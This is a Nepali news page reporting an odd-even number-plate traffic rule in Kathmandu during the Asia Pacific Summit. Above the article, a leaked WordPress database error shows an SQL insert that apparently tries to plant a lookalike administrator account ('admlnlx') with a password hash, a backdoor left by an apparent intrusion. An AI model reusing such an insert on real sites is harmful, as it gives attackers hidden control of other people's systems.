WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bx7oJM1sfZ9cBJOJc1Zq89xsLzJdKn.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 04:30:04', '', 'admlnlx', 'admlnlx')

बिहीवार देखी आइतबारसम्म काठमाण्डौमा जोर विजोर नम्बर प्रणाली लागू – Gaule Khabar

बिहीवार देखी आइतबारसम्म काठमाण्डौमा जोर विजोर नम्बर प्रणाली लागू

बिहीवार देखी आइतबारसम्म काठमाण्डौमा जोर विजोर नम्बर प्रणाली लागू

काठमाण्डौ, मंसिर ११, आगामी बिहिबारदेखि आइतबारसम्म काठमाडौंमा जोर विजोर नम्बर अनुसार सवारी चल्ने भएका छन्।

शुक्रबारदेखि सोमबारसम्म हुने एसिया प्यासिफिक समिट क्रममा सवारी जाम नहोस् भनेर जोर विजोर नम्बरका आधारमा निजी तथा सार्वजनिक गाडी चलाउने तयारी भएको महानगरिय ट्राफिक प्रहरी महाशाखाले जनाएको छ।

महाशाखाका अनुसार मंसिर १३ गते बिहिबार र मंसिर १५ गते शनिबार नम्बर प्लेटको अन्तिम अंक विजोर (१,३,५,७,९) भएका गाडीमात्रै चल्न पाउनेछन् भने मंसिर १४ गते शुक्रबा र मंसिर १६ गते आइतबार जोर (०,२,४,६,८) अंक भएका गाडी मात्रै चल्न पाउनेछन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका